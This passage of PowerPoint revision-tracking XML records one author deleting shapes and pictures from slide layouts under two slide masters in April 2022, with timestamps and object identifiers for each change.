          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:42.452" v="218" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
            <pc:sldLayoutMk cId="1915151227" sldId="2147483733"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:41.973" v="217" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
              <pc:sldLayoutMk cId="1915151227" sldId="2147483733"/>
              <ac:spMk id="6" creationId="{2398E721-2065-8640-9E19-F292A2EEF689}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:42.452" v="218" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
              <pc:sldLayoutMk cId="1915151227" sldId="2147483733"/>
              <ac:picMk id="32" creationId="{7D12AFAA-09C5-F94C-959D-7F1A3CA16281}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:44.502" v="220" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
            <pc:sldLayoutMk cId="2854755913" sldId="2147483734"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:43.894" v="219" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
              <pc:sldLayoutMk cId="2854755913" sldId="2147483734"/>
              <ac:spMk id="16" creationId="{A87593FF-48B4-A049-84B0-C3D11BE77E35}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:44.502" v="220" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
              <pc:sldLayoutMk cId="2854755913" sldId="2147483734"/>
              <ac:picMk id="17" creationId="{A147826A-BD0C-494D-B37E-BFF2D62E5674}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:46.677" v="222" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
            <pc:sldLayoutMk cId="1633109403" sldId="2147483736"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:46.677" v="222" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
              <pc:sldLayoutMk cId="1633109403" sldId="2147483736"/>
              <ac:spMk id="18" creationId="{8DB0657D-345E-3146-973A-8A4B963C85C4}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:45.581" v="221" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
              <pc:sldLayoutMk cId="1633109403" sldId="2147483736"/>
              <ac:picMk id="19" creationId="{B8E0E7A5-8984-8543-8952-9EF63B36FD5E}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:48.157" v="224" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
            <pc:sldLayoutMk cId="416937351" sldId="2147483737"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:48.157" v="224" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
              <pc:sldLayoutMk cId="416937351" sldId="2147483737"/>
              <ac:spMk id="6" creationId="{C037E905-3A2F-7A47-B6B2-2C14131A1838}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:47.752" v="223" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
              <pc:sldLayoutMk cId="416937351" sldId="2147483737"/>
              <ac:picMk id="19" creationId="{99659747-B2F7-3E4C-BDA1-E591D83D3F34}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:49.518" v="226" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
            <pc:sldLayoutMk cId="658091592" sldId="2147483738"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:49.518" v="226" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
              <pc:sldLayoutMk cId="658091592" sldId="2147483738"/>
              <ac:spMk id="6" creationId="{C037E905-3A2F-7A47-B6B2-2C14131A1838}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:49.005" v="225" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
              <pc:sldLayoutMk cId="658091592" sldId="2147483738"/>
              <ac:picMk id="18" creationId="{61ABF563-A106-2941-99AA-9ACBB4A8BD1C}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:50.910" v="228" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
            <pc:sldLayoutMk cId="3848675943" sldId="2147483739"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:50.910" v="228" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
              <pc:sldLayoutMk cId="3848675943" sldId="2147483739"/>
              <ac:spMk id="36" creationId="{AA167B85-83DB-B243-8DD4-89388138663F}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:50.380" v="227" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
              <pc:sldLayoutMk cId="3848675943" sldId="2147483739"/>
              <ac:picMk id="37" creationId="{9D7B5582-28F6-BF4A-8C11-69C60A8EBD5D}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:52.262" v="230" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
            <pc:sldLayoutMk cId="2926767318" sldId="2147483740"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:52.262" v="230" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
              <pc:sldLayoutMk cId="2926767318" sldId="2147483740"/>
              <ac:spMk id="35" creationId="{E9B5E7B2-C7CB-4744-A960-0F8279B65C80}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:51.807" v="229" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
              <pc:sldLayoutMk cId="2926767318" sldId="2147483740"/>
              <ac:picMk id="36" creationId="{CCF43862-E39A-6C41-B844-0724F35ECE8D}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:53.563" v="232" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
            <pc:sldLayoutMk cId="3161983445" sldId="2147483741"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:53.563" v="232" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
              <pc:sldLayoutMk cId="3161983445" sldId="2147483741"/>
              <ac:spMk id="6" creationId="{C037E905-3A2F-7A47-B6B2-2C14131A1838}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:53.150" v="231" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
              <pc:sldLayoutMk cId="3161983445" sldId="2147483741"/>
              <ac:picMk id="17" creationId="{6C5B9D50-D4A1-0347-89FE-8FF2D50C6870}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:55.297" v="234" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
            <pc:sldLayoutMk cId="685225203" sldId="2147483742"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:55.297" v="234" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
              <pc:sldLayoutMk cId="685225203" sldId="2147483742"/>
              <ac:spMk id="5" creationId="{5A03D159-FA7E-7946-A2E3-C277F421E076}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:54.686" v="233" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
              <pc:sldLayoutMk cId="685225203" sldId="2147483742"/>
              <ac:picMk id="15" creationId="{8AC56AF3-9F11-B440-AC79-6B1CC838BCC5}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:58.069" v="236" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
            <pc:sldLayoutMk cId="2201251510" sldId="2147483743"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:58.069" v="236" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
              <pc:sldLayoutMk cId="2201251510" sldId="2147483743"/>
              <ac:spMk id="5" creationId="{5A03D159-FA7E-7946-A2E3-C277F421E076}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:57.684" v="235" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
              <pc:sldLayoutMk cId="2201251510" sldId="2147483743"/>
              <ac:picMk id="16" creationId="{498228BD-9CC7-B141-B403-52DC9748BBCC}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:36:02.036" v="239" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
            <pc:sldLayoutMk cId="2642989951" sldId="2147483745"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:36:02.036" v="239" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
              <pc:sldLayoutMk cId="2642989951" sldId="2147483745"/>
              <ac:spMk id="13" creationId="{4C8FD434-0BC0-3F44-B92B-4573B8018E20}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:36:00.477" v="237" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
              <pc:sldLayoutMk cId="2642989951" sldId="2147483745"/>
              <ac:spMk id="37" creationId="{B0C9A3AD-8935-A94A-B635-253D6F38E83A}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:36:01.184" v="238" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
              <pc:sldLayoutMk cId="2642989951" sldId="2147483745"/>
              <ac:picMk id="39" creationId="{AA73896A-D56B-D44A-BB5C-550240815CF0}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:36:06.525" v="247" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
            <pc:sldLayoutMk cId="2342168683" sldId="2147483746"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:36:06.525" v="247" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
              <pc:sldLayoutMk cId="2342168683" sldId="2147483746"/>
              <ac:spMk id="16" creationId="{A5583B77-0D77-A34E-8283-81275F3E9415}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:36:06.086" v="246" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
              <pc:sldLayoutMk cId="2342168683" sldId="2147483746"/>
              <ac:spMk id="17" creationId="{8CF98308-AFBC-E14C-A180-1231217F1E6E}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:36:05.279" v="244" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
              <pc:sldLayoutMk cId="2342168683" sldId="2147483746"/>
              <ac:spMk id="18" creationId="{D717D3CB-D2D4-6A49-BA33-1E044F035217}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:36:05.662" v="245" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
              <pc:sldLayoutMk cId="2342168683" sldId="2147483746"/>
              <ac:spMk id="19" creationId="{C2210306-A808-2E4A-B31D-FFC4F65B2EF7}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:36:03.565" v="240" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
              <pc:sldLayoutMk cId="2342168683" sldId="2147483746"/>
              <ac:spMk id="38" creationId="{B75CEDAF-9B35-B244-BDC3-8E25466DD827}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:36:04.952" v="243" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
              <pc:sldLayoutMk cId="2342168683" sldId="2147483746"/>
              <ac:picMk id="14" creationId="{8B03ABCE-57D0-D849-A0BF-DE80B527E251}"/>
            </ac:picMkLst>
          </pc:picChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:36:04.684" v="242" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
              <pc:sldLayoutMk cId="2342168683" sldId="2147483746"/>
              <ac:picMk id="15" creationId="{CD69A4FD-5642-6546-BCCD-6B3A3C1A7B99}"/>
            </ac:picMkLst>
          </pc:picChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:36:03.997" v="241" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
              <pc:sldLayoutMk cId="2342168683" sldId="2147483746"/>
              <ac:picMk id="40" creationId="{232669C8-D9F7-4C4A-83AF-067A99FF3630}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
      </pc:sldMasterChg>
      <pc:sldMasterChg chg="delSp mod modSldLayout">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:36:44.112" v="278" actId="6014"/>
        <pc:sldMasterMkLst>
          <pc:docMk/>
          <pc:sldMasterMk cId="2900578199" sldId="2147483747"/>
        </pc:sldMasterMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:36:10.062" v="248" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="2900578199" sldId="2147483747"/>
            <ac:spMk id="7" creationId="{53724A7B-1CCF-7447-B0FA-CDCAC098C90A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:sldLayoutChg chg="delSp modSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:36:13.383" v="253" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="2900578199" sldId="2147483747"/>
            <pc:sldLayoutMk cId="2234469801" sldId="2147483748"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:36:11.202" v="249" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2900578199" sldId="2147483747"/>
              <pc:sldLayoutMk cId="2234469801" sldId="2147483748"/>
              <ac:spMk id="37" creationId="{C55AACF5-EF00-CB42-823A-B94F99F731DB}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:36:12.452" v="252" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2900578199" sldId="2147483747"/>
              <pc:sldLayoutMk cId="2234469801" sldId="2147483748"/>
              <ac:picMk id="5" creationId="{2B952B70-437C-462C-AD52-0F77143BF82F}"/>
            </ac:picMkLst>
          </pc:picChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:36:13.383" v="253" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2900578199" sldId="2147483747"/>
              <pc:sldLayoutMk cId="2234469801" sldId="2147483748"/>
              <ac:picMk id="9" creationId="{CF182546-D092-4007-AC8E-7DB855065E6E}"/>
            </ac:picMkLst>
          </pc:picChg>
          <pc:picChg chg="del mod">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:36:11.653" v="251" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2900578199" sldId="2147483747"/>
              <pc:sldLayoutMk cId="2234469801" sldId="2147483748"/>
              <ac:picMk id="10" creationId="{EE35D647-412B-43F5-B738-2DBCD83BF2F6}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:36:15.431" v="255" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="2900578199" sldId="2147483747"/>
            <pc:sldLayoutMk cId="1212567642" sldId="2147483749"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:36:15.039" v="254" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2900578199" sldId="2147483747"/>
              <pc:sldLayoutMk cId="1212567642" sldId="2147483749"/>
              <ac:spMk id="16" creationId="{234E3CA2-6739-474E-8D82-5BED10A03FAB}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:36:15.431" v="255" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2900578199" sldId="2147483747"/>
              <pc:sldLayoutMk cId="1212567642" sldId="2147483749"/>
              <ac:picMk id="4" creationId="{62496D60-6A52-48ED-A36D-59816AB37F3E}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp mod">
